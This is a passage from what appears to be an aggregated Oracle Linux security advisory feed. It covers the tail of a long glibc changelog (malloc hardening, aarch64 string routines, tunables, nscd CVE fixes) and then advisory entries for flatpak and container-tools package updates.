3d7229c2507be1daf0c3e15e1f134076fa8b9025 - Fix malloc/ tests for GCC 7 -Walloc-size-larger-than=. - upstream commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 - Further harden glibc malloc metadata against 1-byte overflows. - upstream commit e4e26210c3bdb5dcdce7a3def3b90fa45d3e2c89 - Fix failing test malloc/tst-interpose-nothread with GCC 7. - upstream commit 622222846a2e6ffbcd02cb46cb5f29c48fe4a466 - Call the right helper function when setting mallopt M_ARENA_MAX (BZ #21338) - upstream commit 44e4b889ab0e0497567c8983ad25a78798a3ab51 - manual: Document replacing malloc [BZ #20424 - upstream commit 3b5f801ddb838311b5b05c218caac3bdb00d7c95 - Tweak realloc/MREMAP comment to be more accurate. - upstream commit 4e61a6be446026c327aa70cef221c9082bf0085d - i386: Increase MALLOC_ALIGNMENT to 16 [BZ #21120] - upstream commit d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc - Add per-thread cache to malloc - upstream commit be8aa923a70da16ebabe85e912abc6b815bbdcb4 - * manual/tunables.texi: Add missing @end deftp. - upstream commit ed421fca42fd9b4cab7c66e77894b8dd7ca57ed0 - Avoid backtrace from __stack_chk_fail [BZ #12189] - upstream commit eac43cbb8d808a40004aa0a4a286f5c5155beccb - malloc: Avoid optimizer warning with GCC 7 and -O3 - upstream commit ec2c1fcefb200c6cb7e09553f3c6af8815013d83 - malloc: Abort on heap corruption, without a backtrace [BZ #21754] - upstream commit ac3ed168d0c0b2b702319ac0db72c9b475a8c72e - malloc: Remove check_action variable [BZ #21754] - upstream commit a9da0bb2667ab20f1dbcd0a9ae6846db02fbc96a - malloc: Remove corrupt arena flag - upstream commit 5129873a8e913e207e5f7b4b521c72f41a1bbf6d - malloc: Change top_check return type to void - upstream commit 24cffce7366c4070d8f823702a4fcec2cb732595 - malloc: Resolve compilation failure in NDEBUG mode - upstream commit 0c71122c0cee483a4e6abcdbe78a1595eefe86e2 - malloc: Remove the internal_function attribute - upstream commit 1e26d35193efbb29239c710a4c46a64708643320 - malloc: Fix tcache leak after thread destruction [BZ #22111] - upstream Oct 15, 2017 commit 8e57c9432a2b68c8a1e7f4df28f0e8c7acc04753 - Silence -O3 -Wall warning in malloc/hooks.c with GCC 7 [BZ #22052] - upstream Oct 17, 2017 commit e4dd4ace56880d2f1064cd787e2bdb96ddacc3c4 - Inline tcache functions - upstream Oct 17, 2017 commit e956075a5a2044d05ce48b905b10270ed4a63e87 - Use relaxed atomics for malloc have_fastchunks - upstream Oct 17, 2017 commit 3381be5cdef2e43949db12f66a5a3ec23b2c4c90 - Improve malloc initialization sequence - upstream Oct 18, 2017 commit 2c2245b92ccf6344b324d17d8f94ccd3b8c559c6 - Fix build failure on tilepro due to unsupported atomics - upstream Oct 19, 2017 commit d74e6f6c0de55fc588b1ac09c88eb0fb8b8600af - Fix deadlock in _int_free consistency check - upstream Oct 20, 2017 commit a15d53e2de4c7d83bda251469d92a3c7b49a90db - Add single-threaded path to _int_free - upstream Oct 20, 2017 commit 6d43de4b85b11d26a19bebe4f55f31be16e3d419 - Fix build issue with SINGLE_THREAD_P - upstream Oct 24, 2017 commit 3f6bb8a32e5f5efd78ac08c41e623651cc242a89 - Add single-threaded path to malloc/realloc/calloc/memalloc - upstream Oct 24, 2017 commit 905a7725e9157ea522d8ab97b4c8b96aeb23df54 - Add single-threaded path to _int_malloc - upstream Nov 15, 2017 commit 7a9368a1174cb15b9f1d6342e0e10dd90dae238d - malloc: Account for all heaps in an arena in malloc_info [BZ #22439] - upstream Nov 23, 2017 commit 0a947e061d47c9710838f210506215bd9533324b - malloc: Call tcache destructor in arena_thread_freeres - upstream Nov 30, 2017 commit 34697694e8a93b325b18f25f7dcded55d6baeaf6 - Fix integer overflow in malloc when tcache is enabled [BZ #22375] - upstream Jan 12, 2018 commit 249a5895f120b13290a372a49bb4b499e749806f - malloc: Ensure that the consolidated fast chunk has a sane size. - upstream Jan 29, 2018 commit 406e7a0a47110adbf79326c8a0bda5ffac3e0f10 - malloc: Use assert.h assert macro - upstream Feb 10, 2018 commit 402ecba487804e9196769f39a8d157847d3b3104 - [BZ #22830] malloc_stats: restore cancellation for stderr correctly. - upstream Mar 9, 2018 commit 229855e5983881812b21b215346cb990722c6023 - malloc: Revert sense of prev_inuse in comments - upstream Mar 14, 2018 commit bdc3009b8ff0effdbbfb05eb6b10966753cbf9b8 - malloc: harden removal from unsorted list - malloc: fix merge regressions in previous bundle of patches. Orabug: <29139332> - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - Modified patches to avoid duplication of patch2754 (added in 2.17-260.0.16) - and patch10134. OraBug 29319671. - Reviewed-by: Egeyar Bagcioglu <egeyar.bagcioglu@oracle.com> - Regenerate intl/plural.c OraBug 28806294. - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - intl: Port to Bison 3.0 - Backport of upstream gettext commit 19f23e290a5e4a82b9edf9f5a4f8ab6192871be9 OraBug 28806294. - Reviewed-by: Patrick McGehearty <patrick.mcgehearty@oracle.com> - Fix dbl-64/wordsize-64 remquo (bug 17569). - Backport of upstream d9afe48d55a412e76b0dcb28335fd4b390fe07ae OraBug 19570749. - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - libio: Disable vtable validation in case of interposition. - Backport of upstream c402355dfa7807b8e0adb27c009135a7e2b9f1b0. OraBug 28641867. - Reviewed-by: Egeyar Bagcioglu <egeyar.bagcioglu@oracle.com> - merged bundle of 142 upstream commits for aarch64 support with glibc rhel7 update 6. - upstream commit 75eff3fe90f96783f31f58fa84af1b77e57d1ae4 - trimmed to only add bzero.S, memcmp.S memcpy.S, memmove.S, memset.S, - strcmp.S, strlen.S, strncmp.S and strnlen.S into sysdeps/aarch64. Orabug: <28003847> - upstream commit 08325735c2efb0257b8c07ac0ff91e44c27ecbf8 - Lazy TLSDESC relocation data race fix - upstream commit c71c89e5c72baf43fd44d08dda8ab846eec5b1d6 - fix cfi annotations which used incorrect sign. - upstream commit f008c71455a8f23c2a24c451e61b12ddfca9a54f - fix uninitialized warning for math_private.h - upstream commit d2e4346a30683cc42c57bd1bfd457897d78c6d7e - fix internal asm profiling code - upstream commit efbe665c3a2d344b0d64456cf29499ba53c2965a - add ifunc support for aarch64 - upstream commit d6fc3f6516cd20f195758086fbbbe3f17a8a6d95 - add ChangeLog for ifunc support patch - upstream commit 6cd380dd366d728da9f579eeb9f7f4c47f48e474 - avoid-literals-in-start.S - upstream commit f124cb381116b5809de198327690ad0bd8d1478e - Fix nearbyint arithmetic moved before feholdexcept (bug 22225). - upstream commit db4f87bad48ed93ae14f61121367a7cb94fa46ed - do not use MIN for dl-machine.h - upstream commit a2e0a7f12ba57a49d1380c7ba1ff4b1f51d67347 - Guess L1 cache linesize - upstream commit 58a813bf6e732211af53e690c92c14a50bb06e0e - fix f-max-min for gcc - upstream commit e7df6c5c79458dc042a8c967bafa6e8eca88ae0d - HWCAP additions - upstream commit 14d886edbd3d80b771e1c42fbd9217f9074de9c6 - fix start code for static pie - upstream commit afce1991f6f61514172696ec3edf93331cb0e04f - clean up HWCAP updates - upstream commit 953c49cc3bb1041090281042148197ad3537c551 - more HWCAP additions - upstream commit 3f8d9d58c59fdbe27301d0e18bfd426a5f2edf19 - use builtins for fpcr/fpsr - upstream commit 4f5b921eb9b775aa3549a9bcd684c3013132f04b - add include for fpcr/fpsr fix - upstream commit 0c8a67a5737b4b6dd74bd24219fc642c8d244bee - fix include for fpcr/fpsr fix Orabug: <28036322> - upstream commit 2fee269248c6ef303569d9ac8fec3a27676520e0 - Enable _STRING_ARCH_unaligned on AArch64. - upstream commit 16396c41deab45f715ffd813280d9d685b3b281e - Add _STRING_INLINE_unaligned and string_private.h - upstream commit a8c5a2a9521e105da6e96eaf4029b8e4d595e4f5 - This is an optimized memset for AArch64. - upstream commit b998e16e71c8617746b7c39500e925d28ff22ed8 - This is an optimized memcpy/memmove for AArch64. - upstream commit c435989f52204703d524f467c830dc363439e532 - Optimize the strlen implementation. - upstream commit 58ec4fb881719d0b69989f9a4955290fca531831 - Add a simple rawmemchr implementation. - upstream commit a024b39a4e31a049391b459234f6b3575c9fc107 - This patch further tunes memcpy - upstream commit 95e431cc73c2df3bc606107d6f79c4683bd61102 - An optimized memchr was missing for AArch64. - upstream commit 922369032c604b4dcfd535e1bcddd4687e7126a5 - [AArch64] Optimized memcmp. - upstream commit 4c1d801a5956f049126ef6cbe22ed23693e77a8c - aarch64: Avoid hidden symbols for memcpy/memmove into static binaries - upstream commit 2bce01ebbaf8db52ba4a5635eb5744f989cdbf69 - aarch64: Improve strcmp unaligned performance - upstream commit 84c94d2fd90d84ae7e67657ee8e22c2d1b796f63 - aarch64: Use the L() macro for labels in memcmp - upstream commit 6ca24c43481e2c93a6eec362b04c3e77a35b28e3 - aarch64/strcmp: fix misaligned loop jump target - upstream commit 30a81dae5b752f8aa5f96e7f7c341ec57cba3585 - aarch64: Optimized memcmp for medium to large sizes - upstream commit 4e54d918630ea53e29dd70d3bdffcb00d29ed3d4 - aarch64: Fix branch target to loop16 - upstream commit 7108f1f944792ac68332967015d5e6418c5ccc88 - aarch64: Improve strncmp for mutually misaligned inputs - upstream commit d46f84de745db8f3f06a37048261f4e5ceacf0a3 - aarch64/strncmp: Unbreak builds with old binutils - upstream commit b47c3e7637efb77818cbef55dcd0ed1f0ea0ddf1 - aarch64/strncmp: Use lsr instead of mov+lsr Orabug: <28077661> - upstream commit 3a7ac8a0f596bb73093212cd1109c1413777e1f8 - Remove bp-start.h and INIT_ARGV_and_ENVIRON. - upstream commit 10ad46bc6526edc5c7afcc57112da96917ff3629 - Consolidate valloc/pvalloc code. - upstream commit 520d437b9455560d099fe6bd9664be1f9f76868b - Fix build warnings from systemtap probes in non-systemtap configurations - upstream commit f3eeb3fc560ccc4ce51dc605e4703c5016b07244 - Replace malloc force_reg by atomic_forced_read. - upstream commit 6c8dbf00f536d78b1937b5af6f57be47fd376344 - Reformat malloc to gnu style. - upstream commit bdfe308a166b433a841d5c9ae256560c18bce640 - Remove THREAD_STATS. - upstream commit e0db65176fa88b9497cbd6362b24e3225382bfb6 - Clean up __exit_thread. - upstream commit 79520f4bd611602f5bdb2b50979cf75bb5ac2968 - Use existing makefile variables for dependencies on - upstream commit 75f11331f98ebf3873e887a683add944a1aec0fd - correct alignment of TLS_TCB_ALIGN (BZ #16796) - upstream commit 94c5a52a841f807a23dbdd19a5ddeb505cc1d543 - Consolidate arena_lookup and arena_lock into a single arena_get - upstream commit c26efef9798914e208329c0e8c3c73bb1135d9e3 - malloc: Consistently apply trim_threshold to all heaps [BZ #17195] - upstream commit 92a9b22d70b85b7edd0484db8bf2465a969fb09e - Drop unused first argument from arena_get2 - upstream commit c3b9ef8dfc83e9d17da5adc73709d2f7dfbbaf13 - Do not use the main arena in retry path if it is corrupt - upstream commit 90b2517115a56ca9f5625f3e16c2629deeac55a9 - include/stap-probe.h: Fix formatting. - upstream commit 6782806d8f6664d87d17bb30f8ce4e0c7c931e17 - malloc: Rewrite with explicit TLS access using __thread - upstream commit a62719ba90e2fa1728890ae7dc8df9e32a622e7b - malloc: Prevent arena free_list from turning cyclic [BZ #19048] - upstream commit 730bbab2c39dd615c31c924041b4d16d7f107ae0 - Mark internal unistd functions hidden in ld.so - upstream commit cbb47fa1c6476af73f393a81cd62fc926e1b8f6e - malloc: Manual part of conversion to __libc_lock - upstream commit e33a23fbe8c2dba04fe05678c584d3efcb6c9951 - Add INTERNAL_SYSCALL_CALL - upstream commit be7991c0705e35b4d70a419d117addcd6c627319 - Static inline functions for mallopt helpers - upstream commit afcf3cd8ebff8fed79238a2d1b95338c4606b1ee - New internal function __access_noerrno - upstream commit 67e58f39412ecd4467034761f3f074283c90f3c8 - Add framework for tunables - upstream commit 3c589b1a8a4401e258ba23a03fcbcc79b82393ab - tunables: Use correct unused attribute (fixed build error in 67e58f) - upstream commit 9dd409a5f4a7a053cc962f8371dad0fe5cc22597 - Initialize tunable list with the GLIBC_TUNABLES environment variable - upstream commit 6765d5d34d126b26d55e2d73dac4dfec5e6d6241 - Enhance --enable-tunables to select tunables frontend at build time - upstream commit b31b4d6ae50b0d332207754327598fdce5b51015 - User manual documentation for tunables - upstream commit 34a63b097335d3411080b5b6e5b164ab36563847 - malloc: Run tunables tests only if tunables are enabled - upstream commit d054a81ab3a2515a45d28e6c26d2b190ff74e8ec - tunables: Avoid getenv calls and disable glibc.malloc.check by default - upstream commit 41389c40499a083c59e68ba281ec87be567f2871 - Fix environment traversal when an envvar value is empty - upstream commit f3bef6a748097d02d196df247f7b292c7b83744c - * elf/dl-tunables.c (tunable_set_val_if_valid_range): Split into ... - upstream commit 8b9e9c3c0bae497ad5e2d0ae2f333f62feddcc12 - tunables: Fix environment variable processing for setuid binaries (bz #21073) - upstream commit ed8d5ffd0a14e84298a15ae2ec9b799010166b28 - Drop GLIBC_TUNABLES for setxid programs when tunables is disabled (bz #21073) - upstream commit 53aa04a86c10f49b7481e73d2ca045ecd6ed2df7 - tunables: Fail tests correctly when setgid does not work - upstream commit 43ce02c6ec27d4e2d8f0ae327bbbeaba84060964 - Fix typo in manual - upstream commit 8cbc826c37c0221ada65a7a622fe079b4e89a4b0 - Fix getting tunable values on big-endian (BZ #21109 - upstream commit 1c1243b6fc33c029488add276e56570a07803bfd - Ignore and remove LD_HWCAP_MASK for AT_SECURE programs (bug #21209) - upstream commit 65eff7fbdbddad8c1f9af7cb48cd3b5dca3c5c9d - Update old tunables framework document/script. - upstream commit 17284d650ebe5c736c9730ee16401008f26128c3 - tunables: Make tunable_list relro - upstream commit d13103074ab5c7614eeb94f88a61803ed8f3e878 - tunables: Specify a default value for tunables - upstream commit ad2f35cb396d24391150675fb55311c98d1e1592 - tunables: Add support for tunables of uint64_t type - upstream commit ce79740bdbccea312df6cfcf70689efb57792fc9 - Reduce value of LD_HWCAP_MASK for tst-env-setuid test case - upstream commit ee8015b9ea084d5727ce477fdd8d935f1de7f7f6 - Support dl-tunables.list in subdirectories - upstream commit 81efada5287c3215307623e57d3bbbeefa0c1250 - Make __tunables_init hidden and avoid PLT - upstream commit 4158ba082c641f407009363b186b4c85f8a01a35 - Delay initialization of CPU features struct in static binaries - upstream commit 44330b6d32904fdc8b6835a112e0ba0aee9f4ef3 - tunables: Clean up hooks to get and set tunables - upstream commit ea9b0ecbf0e7b6e8281047624efbe1b2cbb6d487 - tunables: Add LD_HWCAP_MASK to tunables - upstream commit ff08fc59e36e02074eba8ab39b0d9001363970f0 - tunables: Use glibc.tune.hwcap_mask tunable instead of _dl_hwcap_mask - upstream commit f82e9672ad89ea1ef40bbe1af71478e255e87c5e - aarch64: Allow overriding HWCAP_CPUID feature check using HWCAP_MASK - upstream commit 511c5a1087991108118c6e9c9546e83e992bf39c - Make LD_HWCAP_MASK usable for static binaries - upstream commit ea01a4da219011f4a4db97eef3c5bfc2f6e8fc6b - aarch64: Add hwcap string routines - upstream commit 6c85cc2852367ea2db91ff6a1fc0f6fc0653788d - aarch64: Fix undefined behavior in _dl_procinfo - upstream commit 2c0b90ab443abc967cbf75add4f7fde84978cb95 - Enable tunables by default - upstream commit 95a73392580761abc62fc9b1386d232cd55878e9 - tunables: Use direct syscall for access (BZ#21744) - upstream commit a4de0a9008d6f15e1509c9818ba6e50d78bb83f3 - Fix gen-tunables.awk to work with older awk Orabug: <28121777> - upstream commit ddcf6798d35beca3c4eec80ea448b57fd45558f4 - Replace C implementation of bzero with direct call to memset. - upstream commit af96be34825586536ebcfbf5c675e795ddd3c8fa - Replace C implementation of bcopy with a direct call to memmove. - upstream commit 6a2c695266fab34cc057256d1b33d2268183f00e - aarch64: Thunderx specific memcpy and memmove - upstream commit 512d245bc30cca893db6979f42f058e734f345c3 - Add HWCAP_ macros from Linux 4.12 to AArch64 bits/hwcap.h. - upstream commit 738a9914a066a31750925543a8c6d2661bd61345 - benchtests: Print string array elements, int and uint in json - upstream commit 5ee1e3cebc47495a36d17a0066c241978ca6f502 - benchtests: Make memcpy benchmarks print results in json - upstream commit 25d5247277760e669a69618ce99ce6065e92362c - benchtests: New script to parse memcpy results - upstream commit ab85da15301c552e3ea4577a6432aa028bee9295 - aarch64: Call all string function implementations in tests - upstream commit 28cfa3a48e59f9c6b9bc25a003a4ede435841382 - tunables, aarch64: New tunable to override cpu - upstream commit 47ea614b9afcdaef80e09d58afcdad4f96ba3f15 - fix typo - upstream commit 82e06600505cc26810d263a964d9eca6f3cdfe91 - [AArch64] Update dl-procinfo for new HWCAP flags in Linux 4.12 - upstream commit 36ada5f681d86d4abe7b3b47d653d69e5ab2a6fd - aarch64: Optimized memcpy for Qualcomm Falkor processor - upstream commit 61c982910da9b60f7ac48eb1caaac1f4b013dbb1 - benchtests: Remove verification runs from benchmark tests - upstream commit 86c6519ee77d241575653206f33dbe1d4c8436cf - benchtests: Print json in memmove benchmark - upstream 9eee633b68649c94b2404f65d5c9a00c3ed1f068 - Change argument type passed to ifunc resolvers - upstream commit 9c9ec58197d1e18db6f7b39f7dc08b0f5f61df4e - Add thunderx2t99 and thunderx2t99p1 CPU names to tunables list - upstream commit f00bce744e12996a30b7ac5851b001b1dd7beaa9 - Fix glibc.tune.cpu tunable handling - upstream commit 29c933fb35b7bf872f57dc6977c879832983ab6c - benchtests: Make memset benchmarks print json - upstream commit 503c92c37a95f769762e65aff9383b302178c2bc - benchtests: Reallocate buffers for memset - upstream commit dd5bc7f1b385b29d0f90aefe4d9756b35011709b - aarch64: Optimized implementation of memmove for Qualcomm Falkor - upstream commit edbbc86c3a6624dcc0316a4cd78fe1adfb383405 - * sysdeps/aarch64/bzero.S (__bzero): Remove. - upstream commit 4d7632ff687dc60fb9ed38bae682d395017b61a8 - benchtests: Fix walking sizes and directions for *-walk benchmarks - upstream commit eb332f9feb7637eeefed037a683d2a6130d058b1 - benchtests: Bump start size since smaller sizes are noisy - upstream commit 5a67c4fa010abb27e704aa4ea3896f3aa2b39ed7 - aarch64: Optimized memset for falkor - upstream commit 5f1603c331d9e2194170762b7e5e80a5571e4b4e - Convert strcmp benchmark output to json format - upstream commit 4e00196912e63bd44f9a62a88a0f5c5fde25ad86 - aarch64: fix memset with --disable-multi-arch - upstream commit 3dfcbfa1a4bfa39344e8d945ed1bd697c4c9fe96 - benchtests: Reallocate buffers for every test run - upstream commit 96e6a7167e127d5e65000f2724e074f1c026e1f1 - benchtests: Make bench-memcmp print json - upstream commit e9537dddc7c7c7b60b55ed845542c8d586164488 Orabug: <28121801> - upstream commit 9dbebe1a67bbedfcb39c6b739f15bc639e8d40a2 - [AArch64] Save and restore q0-q7 on entry to dynamic linker. - upstream commit 1670e207c57513da84462c2a018f01653e7d1cc6 - aarch64: Rely on syscalls preserving registers - upstream commit f940b96522d6ac67915186dfaa71b43f3e7f5404 - [AArch64] Add optimized strchr. - upstream commit be9d4ccc7fe62751db1a5fdcb31958561dbbda9a - [AArch64] Add optimized strchrnul. - upstream commit 80085defb83e4f2ce098c8bc00c82d1e14998c71 - [AArch64] End frame record chain correctly. [??Bug 17522], release 2.21 - upstream commit aa76a5c7010e98c737d79f37aa6ae668f60f7a00 - [AArch64] Fix strchrnul clobbering v15 - upstream commit ec582ca0f30c963a1c27f405b6732ca8507271d5 - AArch64 optimized implementation of strrchr. - upstream commit dc400d7b735c47086a001ed051723e376230cf01 - AArch64: Optimized implementations of strcpy and stpcpy. - upstream commit d3496c9f4f27d3009b71be87f6108b4fed7314bd - Improve generic strcspn performance - upstream commit 91f3b75f47c9eca3299098c3dcc2f5d9dad320b1 - Improve generic strspn performance - upstream commit 282b71f07eb5e24ddf1308f92c37cb42f7c7d86b - Improve generic strpbrk performance - upstream commit 2e51bc3813ca3fe72fd197d08d79496e46669f43 - Use PTR_ALIGN_DOWN on strcspn and strspn - upstream commit f6a191a6ee0313d61dffa70d86b033c5a598f907 - Consolidate Linux read syscall - Fixes BZ#21428 - upstream commit ed0257f7d3378ec4a72e297f0dcba5159f2dd138 - [AArch64] Adjust elf_machine_dynamic to use _GLOBAL_OFFSET_TABLE_ - upstream commit e535ce250143b9c1600b306911710c0de73e2a5e - [ARM] add missing -funwind-tables to test case (bug 19529) - upstream commit a68ba2f3cd3cbe32c1f31e13c20ed13487727b32 - [AARCH64] Rewrite elf_machine_load_address using _DYNAMIC symbol - upstream commit db9bab09a51188bf57afeb47040ce6837b878367 - Document cache information sysconf variables - upstream commit a2e0a7f12ba57a49d1380c7ba1ff4b1f51d67347 - aarch64: Document _SC_LEVEL1_DCACHE_LINESIZE caveat - upstream commit 659ca267360e1c1f64eea9205bb81cb5e9049908 - aarch64: optimize _dl_tlsdesc_dynamic fast path - upstream commit 3d1d79283e6de4f7c434cb67fb53a4fd28359669 - aarch64: fix static pie enabled libc when main is in a shared library - upstream commit c9e613a728b9eaf0713b5a5970bb9ad4984fc688 - Add NT_ARM_SVE to elf.h Orabug: <28336148> - Rebase of the aarch64 OL 7.4 patches. - Enable ifunc support. (Egeyar Bagcioglu 2.17-196.0.2.el7_4.2) Orabug: <26894372>[2.17-326.3]- nscd: Fix timeout type in netgroup cache (RHEL-34263)[2.17-326.2]- nscd: Do not use sendfile for the netgroup cache- nscd: Use-after-free in netgroup cache- CVE-2021-27645: nscd: double-free in netgroup cache- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34263)- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache- CVE-2024-33601: nscd: crash on out-of-memory condition- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules[2.17-326.1]- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-31803)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12442
18.06.2024 03:00:00	oraclelinux	[ELSA-2024-3980] flatpak security update (important)	[1.0.9-13]- Fix CVE-2024-32462	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3980
18.06.2024 03:00:00	oraclelinux	[ELSA-2024-3968] container-tools:ol8 bug fix and enhancement update (moderate)	aardvark-dns[2:1.10.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.10.0- Related: Jira:RHEL-2110[2:1.9.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.9.0- Related: Jira:RHEL-2110[2:1.8.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.8.0- Related: Jira:RHEL-2110buildah[2:1.33.7-2]- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/997beea)- Resolves: RHEL-28725cockpit-podman[84.1-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/84.1- Related: Jira:RHEL-25557[84-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/84- Related: Jira:RHEL-2110[83-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/83- Related: Jira:RHEL-2110[82-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/82- Related: Jira:RHEL-2110[81-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/81- Related: Jira:RHEL-2110[80-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/80- Related: Jira:RHEL-2110[79-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/79- Related: Jira:RHEL-2110[78-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/78- Related: Jira:RHEL-2110[77-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/77- Related: Jira:RHEL-2110[75-1]- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/75- Related: #2176055conmon[3:2.1.10-1]- update to https://github.com/containers/conmon/releases/tag/v2.1.10- Related: Jira:RHEL-2110[3:2.1.8-1]- update to https://github.com/containers/conmon/releases/tag/v2.1.8- Related: #2176055containernetworking-plugins[1:1.4.0-2]- rebuild- Resolves: RHEL-18390[1:1.4.0-1]- update to https://github.com/containernetworking/plugins/releases/tag/v1.4.0- Related: Jira:RHEL-2110containers-common[2:1-81.0.1]- Updated removed references [Orabug: 33473101] (Alex Burmashev)- Adjust registries.conf (Nikita Gerasimov)- remove references to RedHat registry (Nikita Gerasimov)[2:1-81]- Update shortnames from Pyxis- Related: Jira:RHEL-2110[2:1-80]- bump release to preserve upgrade path- Resolves: Jira:RHEL-12277container-selinux[2:2.229.0-2]- remove watch statements properly for RHEL8 and lower- Related: Jira:RHEL-2110[2:2.229.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.229.0- Related: Jira:RHEL-2110[2:2.228.1-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.228.1- Related: Jira:RHEL-2110[2:2.228.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.228.0- Related: Jira:RHEL-2110[2:2.227.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.227.0- Related: Jira:RHEL-2110[2:2.226.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.226.0- remove dependency on policycoreutils-python-utils as it pulls in python- Related: Jira:RHEL-2110[2:2.224.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.224.0- Related: Jira:RHEL-2110[2:2.222.0-1]- update to https://github.com/containers/container-selinux/releases/tag/v2.222.0- Related: Jira:RHEL-2110criu[3.18-5]- rebuild to preserve upgrade path- Related: RHEL-32671[3.18-4]- switch to egg-info on 8.9- Related: #2176055[3.18-3]- remove --progress-bar option- Related: #2176055[3.18-2]- update to 3.18- Related: #2176055[3.17-1]- update to 3.17- Resolves: #2175794crun[1.14.3-2]- remove BR libgcrypt-devel, no longer needed- Related: Jira:RHEL-2110[1.14.3-1]- update to https://github.com/containers/crun/releases/tag/1.14.3- Related: Jira:RHEL-2110[1.14.1-1]- update to https://github.com/containers/crun/releases/tag/1.14.1- Related: Jira:RHEL-2110[1.14-1]- update to https://github.com/containers/crun/releases/tag/1.14- Related: Jira:RHEL-2110[1.13-1]- update to https://github.com/containers/crun/releases/tag/1.13- Related: Jira:RHEL-2110[1.12-1]- update to https://github.com/containers/crun/releases/tag/1.12- Related: Jira:RHEL-2110[1.11.2-1]- update to https://github.com/containers/crun/releases/tag/1.11.2- Related: Jira:RHEL-2110[1.11.1-1]- update to https://github.com/containers/crun/releases/tag/1.11.1- Related: Jira:RHEL-2110[1.11-1]- update to https://github.com/containers/crun/releases/tag/1.11- Related: Jira:RHEL-2110[1.9.2-1]- update to https://github.com/containers/crun/releases/tag/1.9.2- Related: Jira:RHEL-2110[1.9.1-1]- update to https://github.com/containers/crun/releases/tag/1.9.1- Related: Jira:RHEL-2110[1.9-1]- update to https://github.com/containers/crun/releases/tag/1.9- Related: Jira:RHEL-2110fuse-overlayfs[1.13-1]- update to https://github.com/containers/fuse-overlayfs/releases/tag/v1.13- Related: Jira:RHEL-2110libslirp[4.4.0-2]- rebuild to preserve upgrade path 8.9 -> 8.10- Related: RHEL-32671netavark[2:1.10.3-1]- update to https://github.com/containers/netavark/releases/tag/v1.10.3- Related: Jira:RHEL-2110[2:1.10.2-1]- update to https://github.com/containers/netavark/releases/tag/v1.10.2- Related: Jira:RHEL-2110[2:1.10.1-1]- update to https://github.com/containers/netavark/releases/tag/v1.10.1- Related: Jira:RHEL-2110[2:1.10.0-1]- update to https://github.com/containers/netavark/releases/tag/v1.10.0- Related: Jira:RHEL-2110[2:1.9.0-1]- update to https://github.com/containers/netavark/releases/tag/v1.9.0- Related: Jira:RHEL-2110[2:1.8.0-2]- fix directory for systemd units- Related: Jira:RHEL-2110[2:1.8.0-1]- update to https://github.com/containers/netavark/releases/tag/v1.8.0- Related: Jira:RHEL-2110oci-seccomp-bpf-hook[1.2.10-1]- update to https://github.com/containers/oci-seccomp-bpf-hook/releases/tag/v1.2.10- Related: Jira:RHEL-2110podman[4:4.9.4-3.0.1]- Add devices on container startup, not on creation[4:4.9.4-3]- BR: /usr/bin/man- Related: RHEL-28727[4:4.9.4-2]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/6464b2c)- Resolves: RHEL-28727python-podman[4.9.0-1]- update to https://github.com/containers/podman-py/releases/tag/v4.9.0- Related: Jira:RHEL-2110[4.8.2-1]- update to https://github.com/containers/podman-py/releases/tag/v4.8.2- Related: Jira:RHEL-2110[4.8.0.post1-1]- update to https://github.com/containers/podman-py/releases/tag/v4.8.0.post1- Related: Jira:RHEL-2110[4.7.0-1]- update to https://github.com/containers/podman-py/releases/tag/v4.7.0- Related: Jira:RHEL-2110runcskopeo[2:1.14.3-2]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/5f2b9af)- Resolves: RHEL-28728[2:1.14.3-1]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/4a2bc3a)- Resolves: RHEL-28226slirp4netns[1.2.3-1]- update to https://github.com/rootless-containers/slirp4netns/releases/tag/v1.2.3- Related: Jira:RHEL-2110[1.2.2-1]- update to https://github.com/rootless-containers/slirp4netns/releases/tag/v1.2.2- Related: Jira:RHEL-2110udica[0.2.6-21]- bump release to preserve update path- Resolves: RHEL-32671[0.2.6-20]- bump release to preserve update path- Related: #2139052	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3968
